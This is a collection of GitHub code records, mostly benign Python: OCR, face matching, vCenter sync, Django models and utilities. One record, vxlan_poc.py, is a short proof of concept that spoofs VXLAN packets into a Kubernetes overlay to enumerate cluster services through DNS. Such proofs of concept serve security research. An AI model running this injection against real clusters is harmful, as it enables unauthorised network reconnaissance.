parser.add_argument(\"--base\", type=str, help=\"vpn ip range base\", default=\"172.20.20\")\n parser.add_argument(\"--vendor\", type=str, help=\"vpn mac address vendor id\", default=\"fc:d8:47\")\n\n args = parser.parse_args()\n\n with VpnSwitch(args.ip, args.port, args.base, args.vendor) as switch:\n print(f\"[+] up @ {args.base}.0/24\")\n while True:\n if switch.pending():\n switch.accept()\n switch.drain()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"omerk2511/m4chi","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"2882588314","text":"import ipaddress\n\nfrom scapy.all import *\n\n# outer\nnodemac=\"52:54:00:22:f6:29\"\noutersrc=\"10.123.0.10\"\nouterdst=\"10.123.0.20\"\nvxlanport=4789\nvni=1\n\n# inner\nbroadcastmac=\"ae:b0:b2:b5:13:20\" # VTEP\nbastion=\"10.123.0.8\"\ndestination=\"10.100.0.10\"\ndstport=53\nsrcport=55353\n\nvxlan=Ether(dst=nodemac)/IP(src=outersrc,dst=outerdst)/UDP(sport=vxlanport,dport=vxlanport)/VXLAN(vni=vni,flags=\"Instance\")\n\npacket=vxlan/Ether(dst=broadcastmac)/IP(src=bastion,dst=destination)/UDP(sport=srcport,dport=dstport)/DNS(rd=1,qd=DNSQR(qname=\"any.any.svc.cluster.local\",qtype=\"SRV\"))\n\nsniff = AsyncSniffer(filter=f\"udp and port {srcport}\", count=1)\nsniff.start()\n\nsendp(packet, loop=0)\nsniff.join()\n\npkt = sniff.results[0]\ndns = pkt.getlayer(3)\nfor i in range(0,len(dns.an.layers())):\n rrsrv = dns.an.getlayer(i)\n name = rrsrv.target.decode().rstrip('.')\n print(f\"{name}:{rrsrv.port}\")\n\n","repo_name":"jpts/k8s-network-abuse","sub_path":"vxlan_poc.py","file_name":"vxlan_poc.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18465311681","text":"import numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot\r\nfrom PIL import Image\r\nfrom numpy import asarray\r\nfrom scipy.spatial.distance import cosine\r\nfrom mtcnn.mtcnn import MTCNN\r\n# from keras_applications.imagenet_utils import _obtain_input_shape\r\nfrom keras_vggface.vggface import VGGFace\r\nfrom keras_vggface.utils import preprocess_input\r\nimport ssl\r\nimport matplotlib.pyplot as plt\r\n# %matplotlib inline\r\nfrom PIL import Image, ImageFilter,ImageEnhance\r\nimport imutils\r\nfrom tesserocr import PyTessBaseAPI\r\nimport tempfile\r\nfrom string import digits\r\nimport re\r\nimport pandas as pd\r\nfrom datetime import date\r\n\r\ndef rotate(filename):\r\n image = cv2.imread(filename)\r\n rotated=cv2.rotate(image,cv2.ROTATE_90_COUNTERCLOCKWISE)\r\n plt.imshow( rotated)\r\n cv2.imwrite('cmnd_test.jpg',rotated)\r\ndef equalizeHist(filename):\r\n image = cv2.imread(filename)\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY);\r\n gray = cv2.equalizeHist(gray)\r\n cv2.imwrite('cmnd_test.jpg',gray)\r\ndef detect_chu(filename):\r\n image = cv2.imread(filename)\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bitwise_not(gray)\r\n thresh = cv2.threshold(gray, 0, 255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n\r\n coords = np.column_stack(np.where(thresh > 0))\r\n angle = cv2.minAreaRect(coords)[-1]\r\n\r\n if angle < -45:\r\n angle = -(90 + angle)\r\n\r\n # otherwise, just take the inverse of the angle to make\r\n # it positive\r\n else:\r\n angle = -angle\r\n\r\n\r\n # rotate the image to deskew it\r\n (h, w) = image.shape[:2]\r\n center = (w // 2, h // 2)\r\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\r\n rotated = cv2.warpAffine(image, M, (w, h),\r\n flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\r\n\r\n\r\n cv2.putText(rotated, \"Angle: {:.2f} degrees\".format(angle),\r\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n # show the output image\r\n print(\"[INFO] angle: {:.3f}\".format(angle))\r\n cv2.imwrite('cmnd_test.jpg',rotated)\r\n\r\ndef detect_cmnd(filename,output):\r\n image = cv2.imread(filename)\r\n ratio = image.shape[0] / 300.0\r\n orig = image.copy()\r\n image = imutils.resize(image, height = 300)\r\n\r\n # convert the image to grayscale, blur it, and find edges\r\n # in the image\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bilateralFilter(gray, 11, 17, 17)\r\n edged = cv2.Canny(gray, 30, 200)\r\n cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n cnts = imutils.grab_contours(cnts)\r\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]\r\n screenCnt = None\r\n for c in cnts:\r\n # approximate the contour\r\n peri = cv2.arcLength(c, True)\r\n approx = cv2.approxPolyDP(c, 0.015 * peri, True)\r\n\r\n # if our approximated contour has four points, then\r\n # we can assume that we have found our screen\r\n if len(approx) == 4:\r\n screenCnt = approx\r\n break\r\n startY=screenCnt[0][0][0]\r\n startX=screenCnt[0][0][1]\r\n endY=screenCnt[1][0][1]\r\n endX=screenCnt[3][0][0]\r\n im=image[startY:endY, startX:endX]\r\n plt.imshow(im)\r\n cv2.imwrite(output,im)\r\n # cv2.imshow('image_all',im)\r\n # cv2.waitKey(0)\r\n\r\n\r\ndef kiemtratinh(tinhthanh,tinh):\r\n for i in range(len(tinhthanh)):\r\n a=tinhthanh[i].find(tinh)\r\n if a==0:\r\n return 1\r\n#keras==2.2.5\r\n# tensorflow== 1.14\r\ndef multipartimage_to_numpyimage(multipartfile):\r\n image_bytedata = multipartfile.read()\r\n\r\n decoded = np.frombuffer(image_bytedata, np.uint8)\r\n np_image = cv2.imdecode(decoded, -1)\r\n\r\n return np_image\r\n\r\ndef extract_face(pixels, required_size=(224, 224)):\r\n\r\n detector = MTCNN()\r\n # detect faces in the image\r\n results = detector.detect_faces(pixels)\r\n # extract the bounding box from the first face\r\n x1, y1, width, height = results[0]['box']\r\n x2, y2 = x1 + width, y1 + height\r\n # extract the face\r\n face = pixels[y1: y2, x1: x2]\r\n # resize pixels to the model size\r\n image = Image.fromarray(face)\r\n image = image.resize(required_size)\r\n face_array = asarray(image)\r\n # cv2.imwrite('a.jpg',face_array)\r\n return face_array\r\n\r\n\r\ndef get_embeddings(filenames):\r\n ssl._create_default_https_context = ssl._create_unverified_context\r\n\r\n # extract faces\r\n faces = [extract_face(f) for f in filenames]\r\n # convert into an array of samples\r\n samples = asarray(faces, 'float32')\r\n # prepare the face for the model, e.g. center pixels\r\n samples = preprocess_input(samples, version=2)\r\n # create a vggface model\r\n model = VGGFace(model='resnet50', include_top=False, input_shape=(224, 224, 3), pooling='avg')\r\n # perform prediction\r\n yhat = model.predict(samples)\r\n return yhat\r\n\r\n\r\ndef is_match(known_embedding, candidate_embedding, thresh=0.5):\r\n # calculate distance between embeddings\r\n score = cosine(known_embedding, candidate_embedding)\r\n if (score <= thresh):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef rotated(filename,file_out):\r\n image = cv2.imread(filename)\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bitwise_not(gray)\r\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n\r\n coords = np.column_stack(np.where(thresh > 0))\r\n angle = cv2.minAreaRect(coords)[-1]\r\n\r\n if angle < -45:\r\n angle = -(90 + angle)\r\n\r\n # otherwise, just take the inverse of the angle to make\r\n # it positive\r\n else:\r\n angle = -angle\r\n\r\n # rotate the image to deskew it\r\n (h, w) = image.shape[:2]\r\n center = (w // 2, h // 2)\r\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\r\n rotated = cv2.warpAffine(image, M, (w, h),\r\n flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\r\n\r\n # show the output image\r\n # print(\"[INFO] angle: {:.3f}\".format(angle))\r\n # plt.imshow(image)\r\n cv2.imwrite(file_out, rotated)\r\n\r\n\r\ndef detect_cmnd(image,filename_out):\r\n # image = cv2.imread('cmnd_test.jpg')\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n # ratio = image.shape[0] / 300.0\r\n # orig = image.copy()\r\n # image = imutils.resize(image, height = 300)\r\n\r\n # convert the image to grayscale, blur it, and find edges\r\n # in the image\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bilateralFilter(gray, 11, 17, 17)\r\n edged = cv2.Canny(gray, 30, 200)\r\n\r\n cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n cnts = imutils.grab_contours(cnts)\r\n cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:10]\r\n screenCnt = None\r\n\r\n for c in cnts:\r\n # approximate the contour\r\n peri = cv2.arcLength(c, True)\r\n approx = cv2.approxPolyDP(c, 0.015 * peri, True)\r\n\r\n # if our approximated contour has four points, then\r\n # we can assume that we have found our screen\r\n if len(approx) == 4:\r\n screenCnt = approx\r\n break\r\n\r\n startY = screenCnt[0][0][1]\r\n startX = screenCnt[1][0][0]\r\n endY = screenCnt[2][0][1]\r\n endX = screenCnt[3][0][0]\r\n im = image[startY:endY, startX:endX]\r\n # plt.imshow(im)\r\n # cv2.waitKey(0)\r\n cv2.imwrite(filename_out, im)\r\n\r\n\r\nIMAGE_SIZE = 1800\r\nBINARY_THREHOLD = 180\r\n\r\n\r\nsize = None\r\n\r\n\r\ndef get_size_of_scaled_image(im):\r\n global size\r\n if size is None:\r\n length_x, width_y = im.size\r\n factor = max(1, int(IMAGE_SIZE / length_x))\r\n size = factor * length_x, factor * width_y\r\n return size\r\ndef set_image_dpi(file_path):\r\n im = Image.open(file_path)\r\n length_x, width_y = im.size\r\n factor = max(1, int(IMAGE_SIZE / length_x))\r\n size = factor * length_x, factor * width_y\r\n # size = (1800, 1800)\r\n im_resized = im.resize(size, Image.ANTIALIAS)\r\n temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.jpg')\r\n temp_filename = temp_file.name\r\n im_resized.save(temp_filename, dpi=(300, 300))\r\n return temp_filename\r\n\r\ndef image_smoothening(img):\r\n ret1, th1 = cv2.threshold(img, BINARY_THREHOLD, 255, cv2.THRESH_BINARY)\r\n ret2, th2 = cv2.threshold(th1, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n blur = cv2.GaussianBlur(th2, (1, 1), 0)\r\n ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n return th3\r\n\r\ndef remove_noise_and_smooth(file_name):\r\n img = cv2.imread(file_name, 0)\r\n filtered = cv2.adaptiveThreshold(img.astype(np.uint8), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 41,\r\n 3)\r\n kernel = np.ones((1, 1), np.uint8)\r\n opening = cv2.morphologyEx(filtered, cv2.MORPH_OPEN, kernel)\r\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\r\n img = image_smoothening(img)\r\n or_image = cv2.bitwise_or(img, closing)\r\n return or_image\r\n\r\ndef process_image_for_ocr(file_path):\r\n # TODO : Implement using opencv\r\n temp_filename = set_image_dpi(file_path)\r\n im_new = remove_noise_and_smooth(temp_filename)\r\n return im_new\r\n\r\ndef detect_text(filename):\r\n\r\n image = cv2.imread(filename)\r\n img = cv2.fastNlMeansDenoisingColored(image, None, 10, 10, 5, 13)\r\n\r\n kernel = np.ones((1, 1), np.uint8)\r\n img = cv2.dilate(img, kernel, iterations=1)\r\n img = cv2.erode(img, kernel, iterations=1)\r\n\r\n cv2.imwrite('cmnd1.jpg', img)\r\n image = cv2.imread('cmnd1.jpg')\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n # que quan\r\n x = 300\r\n y = 368\r\n w = 600\r\n h = 100\r\n\r\n nativecountry = image[y:y + h, x:x + w]\r\n\r\n ret1, th1 = cv2.threshold(nativecountry, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('quequan.jpg', th1)\r\n\r\n # name\r\n x = 220\r\n y = 190\r\n w = 630\r\n h = 100\r\n name = image[y:y + h, x:x + w]\r\n\r\n ret2, th2 = cv2.threshold(name, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n # th2 = cv2.adaptiveThreshold(th2.astype(np.uint8), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 41,3)\r\n # th2 = cv2.morphologyEx(th2, cv2.MORPH_OPEN, kernel)\r\n # th2 = cv2.morphologyEx(th2, cv2.MORPH_CLOSE, kernel)\r\n cv2.imwrite('name.jpg', th2)\r\n\r\n # birthday\r\n\r\n x = 270\r\n y = 310\r\n w = 630\r\n h = 60\r\n birthday = image[y:y + h, x:x + w]\r\n ret3, th3 = cv2.threshold(birthday, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('birthday.jpg', th3)\r\n\r\n # dia chi\r\n\r\n x = 280\r\n y = 470\r\n w = 640\r\n h = 110\r\n\r\n address = image[y:y + h, x:x + w]\r\n\r\n # address = cv2.bitwise_not(address)\r\n thresh = cv2.threshold(address, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)[1]\r\n # thresh = cv2.bitwise_not(thresh)\r\n ret4, th4 = cv2.threshold(address, 1, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('address.jpg', thresh)\r\n\r\n # so cmnd\r\n x = 460\r\n y = 145\r\n w = 330\r\n h = 50\r\n\r\n number = image[y:y + h, x:x + w]\r\n\r\n ret5, th5 = cv2.threshold(number, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('sochungminh.jpg', th5)\r\n\r\n result=[]\r\n images = ['address.jpg', 'name.jpg', 'birthday.jpg', 'quequan.jpg', 'sochungminh.jpg']\r\n with PyTessBaseAPI(path='D:/tessdata-master/.', lang='vie') as api:\r\n for img in images:\r\n api.SetImageFile(img)\r\n a=api.GetUTF8Text()\r\n result.append(a)\r\n kq = []\r\n print(kq)\r\n dc=result[0].replace('\\n', ' ')\r\n ten = result[1].replace('\\n', ' ')\r\n ngay = result[2].replace('\\n', ' ')\r\n que = result[3].replace('\\n', ' ')\r\n socmnd = result[4].replace('\\n', ' ')\r\n df = pd.read_excel(r'tinh.xlsx',\r\n encoding='utf-8') # for an earlier version of Excel, you may need to use the file extension of 'xls'\r\n tinhthanh = df['Tỉnh']\r\n st = result[0]\r\n t = st.split('\\n')\r\n dc = t[1]\r\n dc = dc.split(', ')\r\n tinh = dc[2]\r\n if kiemtratinh(tinhthanh, tinh) == 1:\r\n NGAYSINH = result[2]\r\n NGAYSINH = NGAYSINH.split('-')\r\n ngay = NGAYSINH[0].split(' ')[2]\r\n ngay = int(ngay)\r\n thang = NGAYSINH[1]\r\n thang = int(thang)\r\n nam = NGAYSINH[2].split(' ')\r\n nam = nam[0]\r\n nam = int(nam)\r\n\r\n today = date.today()\r\n year = today.strftime('%m/%d/%Y')\r\n a = year[6:10]\r\n a = int(a)\r\n if (((a - nam) >= 15) & ((a - nam) <= 150)) & ((ngay >= 1) & (ngay <= 31)) & ((thang >= 1) & (thang <= 12)):\r\n kq = 'Đăng ký thành công'\r\n else:\r\n kq = 'Thông tin sai sót, đề nghị nhập lại'\r\n else:\r\n kq = 'Không tồn tại tỉnh'\r\n\r\n return kq","repo_name":"ThuyMo/backend","sub_path":"server-fe/server/image_process_server/server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20239810620","text":"# 332. Reconstruct Itinerary\n\n# You are given a list of airline tickets where tickets[i] = [fromi, toi] represent the departure and the arrival airports of one flight. Reconstruct the itinerary in order and return it.\n\n# All of the tickets belong to a man who departs from \"JFK\", thus, the itinerary must begin with \"JFK\". If there are multiple valid itineraries, you should return the itinerary that has the smallest lexical order when read as a single string.\n\n# For example, the itinerary [\"JFK\", \"LGA\"] has a smaller lexical order than [\"JFK\", \"LGB\"].\n# You may assume all tickets form at least one valid itinerary. You must use all the tickets once and only once.\n\n# Example 1:\n# Input: tickets = [[\"MUC\",\"LHR\"],[\"JFK\",\"MUC\"],[\"SFO\",\"SJC\"],[\"LHR\",\"SFO\"]]\n# Output: [\"JFK\",\"MUC\",\"LHR\",\"SFO\",\"SJC\"]\n\n# Example 2:\n# Input: tickets = [[\"JFK\",\"SFO\"],[\"JFK\",\"ATL\"],[\"SFO\",\"ATL\"],[\"ATL\",\"JFK\"],[\"ATL\",\"SFO\"]]\n# Output: [\"JFK\",\"ATL\",\"JFK\",\"SFO\",\"ATL\",\"SFO\"]\n# Explanation: Another possible reconstruction is [\"JFK\",\"SFO\",\"ATL\",\"JFK\",\"ATL\",\"SFO\"] but it is larger in lexical order.\n\nfrom typing import List\n\n\nclass Solution:\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n graph = {}\n res = []\n \n for item in tickets:\n start, dest = item\n if start not in graph:\n graph[start] = []\n graph[start].append(dest)\n \n for item in graph.values():\n item.sort()\n \n print(graph)\n\n def dfs(node):\n if node in graph:\n dest = graph[node]\n while dest and len(dest) > 0:\n nextNode = dest.pop(0)\n dfs(nextNode)\n res.append(node)\n \n dfs('JFK')\n \n return res[::-1]\n\n# test\nsolution = Solution()\nres = solution.findItinerary([[\"JFK\",\"SFO\"],[\"JFK\",\"ATL\"],[\"SFO\",\"ATL\"],[\"ATL\",\"JFK\"],[\"ATL\",\"SFO\"]])\nprint(res)","repo_name":"HarryXiong24/code-collection","sub_path":"Data Structure & Algorithm/Data Structure/Graph/DFS/Problem/332. Reconstruct Itinerary/332. Reconstruct Itinerary.py","file_name":"332. Reconstruct Itinerary.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"34152216237","text":"\"\"\"\nMemory-related functions.\n\"\"\"\nfrom typing import Optional\n\nimport click\nimport psutil\n\nfrom pydupfinder.pentode_fi.number import parse_size\n\n\ndef parse_memory_limit(\n ctx: click.Context,\n param: click.Parameter,\n value: Optional[str],\n) -> Optional[int]:\n \"\"\"\n Return the value of max-memory option given as a string.\n\n Takes into acount letter suffices, the '%' suffix means.\n\n :param _ctx: Click Context. Unused.\n :param _param: Click Parameter. Unused.\n :param value: Option value as a string.\n :returns: Option value as a number.\n :raise click.BadParameter: Exception raised if the option value\n cannot be parsed or is non-strictly\n positive, to signal click that the\n option value is not valid.\n \"\"\"\n if value is None:\n return None\n if value.endswith(\"%\"):\n val = value.removesuffix(\"%\")\n val = val.rstrip()\n try:\n parsed = float(val)\n except ValueError:\n raise click.BadParameter( # pylint: disable=raise-missing-from\n f\"Cannot parse size '{value}'.\"\n )\n if parsed < 0 or parsed > 100:\n raise click.BadParameter(\n \"The percentage must be between 0 and 100.\"\n )\n total: int = psutil.virtual_memory().total\n return int(total * parsed / 100)\n return parse_size(ctx, param, value)\n","repo_name":"avysk/pydupfinder","sub_path":"pydupfinder/pentode_fi/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"74758675883","text":"# This python Script is used as an standalone exe in the SCO runbook.\n# It is the second step of the automation which performs the Sync on the libraries taken from DB table .\n# It uses Vcenter APIs to perform the sync\n\nimport requests\nimport json\nimport urllib3\nimport pyodbc\nfrom datetime import datetime\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n#Make DB connection\n\nserver = ':'\ndatabase = ''\nusername = ''\npassword = ''\nconn = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL Server};SERVER='+server+';DATABASE='+database+';UID='+username+';PWD='+ password)\ncursor = conn.cursor()\n\n# This function performs the query to take one lib at a time whose status is 'pending'\n# Once the function gets the lib. Sync is triggered and in the DB status is changed to 'Triggered'\n\ndef sync_subscribed_library(sessionid, payload):\n \n cookie_value = \"sessionid=;vmware-api-session-id=\" + sessionid + \"\"\n lib_headers = {\n 'cookie': cookie_value,\n }\n cursor.execute(\"select top(1) [SubscribedLibraryID] from WHERE SyncStatus = ?\", 'pending')\n date=datetime.now()\n synclibraryid=cursor.fetchone()\n if (synclibraryid is not None):\n synclibraryid=str(synclibraryid[0])\n print(\"proceesing with \" +synclibraryid+ \"at\" +str(date))\n sync_url = \"https:///rest/com/vmware/content/subscribed-library/id:\" + synclibraryid + \"?~action=sync\"\n try:\n print(\"in try\")\n response4 = requests.request(\"POST\", sync_url, headers=lib_headers, data=payload, verify=False)\n print(\" sync triggered with ID: \" + synclibraryid)\n date = datetime.now()\n cursor.execute(\"UPDATE SET SyncStatus = ? WHERE SubscribedLibraryID = ?\", 'Triggered', synclibraryid)\n cursor.execute(\"UPDATE SET SyncDate = ? WHERE SubscribedLibraryID = ?\", date, synclibraryid)\n cursor.commit()\n print(\"db update done\")\n except requests.exceptions.ProxyError as e:\n print(\"in except\")\n print(e)\n date2=datetime.now()\n cursor.execute(\"UPDATE SET SyncStatus = ? WHERE SubscribedLibraryID = ?\", 'Triggered',synclibraryid)\n cursor.execute(\"UPDATE SET SyncDate = ? WHERE SubscribedLibraryID = ?\", date2, synclibraryid)\n cursor.commit()\n print(\"db update done in except\" )\n\n except Exception as e:\n print(\"in except\")\n print(e)\n date2 = datetime.now()\n cursor.execute(\"UPDATE SET SyncStatus = ? WHERE SubscribedLibraryID = ?\", 'Triggered',synclibraryid)\n cursor.execute(\"UPDATE SET SyncDate = ? WHERE SubscribedLibraryID = ?\", date2, synclibraryid)\n cursor.commit()\n print(\"db update done in except\")\n else:\n print(\"sync triggered for all\")\n\n\n# Main function call the AUTH API of Vcenter and pass the session id for sync to sync_subscribed_library()\n\ndef main():\n \n url = \"https:///rest/com/vmware/cis/session\"\n\n payload = {}\n headers = {\n 'Authorization': 'Basic =',\n 'Cookie': 'vmware-api-session-id=f'\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload, verify=False)\n\n response_body = response.json()\n sessionid = response_body['value']\n if (response.status_code == 200):\n sync_subscribed_library(sessionid, payload)\n else:\n print(response.status_code)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"prianca99/Vmware-Content-Libray-Sync---Rest-API","sub_path":"LibrarySync.py","file_name":"LibrarySync.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2515567401","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom django.utils import timezone\nfrom .managers import CustomUserManager\n# Create your models here.\n\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \n email = models.EmailField(('email address'), unique=True)\n username = models.CharField(max_length=255)\n first_name = models.CharField(max_length=255)\n middle_name = models.CharField(max_length=255)\n is_staff = models.BooleanField(default=False)\n is_active = models.BooleanField(default=True)\n is_admin = models.BooleanField(default=False)\n date_joined = models.DateTimeField(default=timezone.now)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = []\n \n objects = CustomUserManager()\n\n def __str__(self):\n return self.emailclear\n \n \n\n ","repo_name":"spectra-py/collections_api","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15741694837","text":"#!/usr/bin/python\n\nimport numpy as np\nfrom astropy.io import fits as pyfits\nimport glob\n\nsigma = np.loadtxt('./sigma_mu.txt')\ne_pecvel = (5*150/cst.c.to('km/s').value)/(np.log(10)*z)\ne_lens = 0.055*z\ne_coh = sigma[:,0]\n\ndef mu_cov(alpha, beta, z, e_coh, e_pecvel, e_lens):\n \"\"\" Assemble the full covariance matrix of distance modulus\n\n See Betoule et al. (2014), Eq. 11-13 for reference\n \"\"\"\n Ceta = sum([pyfits.getdata(mat) for mat in glob.glob('C*.fits')])\n\n Cmu = np.zeros_like(Ceta[::3,::3])\n for i, coef1 in enumerate([1., alpha, -beta]):\n for j, coef2 in enumerate([1., alpha, -beta]):\n Cmu += (coef1 * coef2) * Ceta[i::3,j::3]\n\n # Add diagonal term from Eq. 13\n Cmu[np.diag_indices_from(Cmu)] += e_lens**2 + e_coh**2 + e_pecvel**2 \n return Cmu\n\nif __name__ == \"__main__\":\n Cmu = mu_cov(0.13, 3.1)\n","repo_name":"vicbonj/SN","sub_path":"data/covmat/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8026314686","text":"import numpy\nimport pandas\nfrom scipy.signal import savgol_filter\n\n\ndef points_per_hour(series):\n if len(series) < 2:\n return len(series)\n\n return 1 / numpy.median(series.index[1:] - series.index[:-1])\n\n\ndef savitzky_golay(series, *args, **kwargs):\n return pandas.Series(\n index=series.index, data=savgol_filter(series.values, *args, **kwargs)\n )\n\n\ndef with_overhangs(values, overhang_size):\n start_overhang = numpy.repeat(\n [numpy.median(values[0 : overhang_size // 2 + 1])], overhang_size\n )\n end_overhang = numpy.repeat(\n [numpy.max(values[-1 - overhang_size // 2 : -1])], overhang_size\n )\n return pandas.Series(numpy.concatenate([start_overhang, values, end_overhang]))\n\n\ndef normalize_time_unit(curve: pandas.Series, unit: str = \"hours\"):\n if unit == \"hours\":\n return curve\n elif unit == \"minutes\":\n return pandas.Series(index=curve.index / 60.0, data=curve.values)\n else:\n raise NotImplementedError(\"Unsupported time unit: '{}'\".format(unit))\n","repo_name":"biosustain/croissance","sub_path":"croissance/estimation/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"19"} +{"seq_id":"72864529642","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('backend', '0020_pulldevice_delimiter'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='device',\n name='datetime_title',\n field=models.CharField(max_length=30, null=True),\n ),\n ]","repo_name":"cratas/home-automation-rpi","sub_path":"home_automation/backend/migrations/0021_device_datetime_title.py","file_name":"0021_device_datetime_title.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29620219906","text":"import sys\r\nfrom PySide2.QtCore import Qt, QSize\r\nfrom PySide2.QtWidgets import QApplication, QStyle\r\nfrom PySide2.QtGui import QColor, QPalette\r\n\r\nfrom unittest.mock import Mock, patch\r\n \r\ndef hud_test():\r\n attrs = {'settings.HUD_TITLE': \"HUD\"}\r\n mock = Mock(**attrs)\r\n with patch.dict('sys.modules', {\r\n 'castervoice' : mock,\r\n 'castervoice.lib' : mock,\r\n 'castervoice.lib.merge' : mock,\r\n 'castervoice.lib.merge.communication' : mock,\r\n 'castervoice.lib.merge.communication.Communicator' : mock,\r\n 'dragonfly' : mock,\r\n }):\r\n from hud import HUDWindow\r\n huds_launch(HUDWindow) \r\n \r\ndef huds_launch(HUDWindow):\r\n app = QApplication(sys.argv)\r\n windows = [\r\n HUDWindow(Mock()),\r\n HUDWindow(Mock()),\r\n HUDWindow(Mock()),\r\n HUDWindow(Mock()),\r\n ]\r\n \r\n setup_themes(windows)\r\n \r\n for window in windows:\r\n window.show()\r\n \r\n messages = [\r\n '< numb one',\r\n '> Numbers: [] numb , , 1',\r\n '< numb two',\r\n '> Numbers: [] numb , , 2',\r\n '< numb three',\r\n '> Numbers: [] numb , , 3',\r\n '< numb four',\r\n '> Numbers: [] numb , , 4',\r\n '< numb five',\r\n '> Numbers: [] numb , , 5',\r\n '< numb six',\r\n '> Numbers: [] numb , , 6',\r\n ]\r\n \r\n for i, message in enumerate(messages):\r\n for window in windows:\r\n window.output.append(message)\r\n\r\n app.exec_()\r\n\r\ndef setup_themes(windows):\r\n theme_window(\r\n window = windows[0], \r\n window_height = 200,\r\n alignment = Qt.AlignHCenter | Qt.AlignVCenter, \r\n background_color = QColor(245, 245, 245, 255), \r\n font_size = 8, \r\n margins = 4, \r\n scrollbar = True,\r\n frameless = False,\r\n )\r\n windows[0].output.setAlignment(Qt.AlignLeft | Qt.AlignBottom)\r\n\r\n theme_window(\r\n window = windows[1], \r\n window_height = 200,\r\n 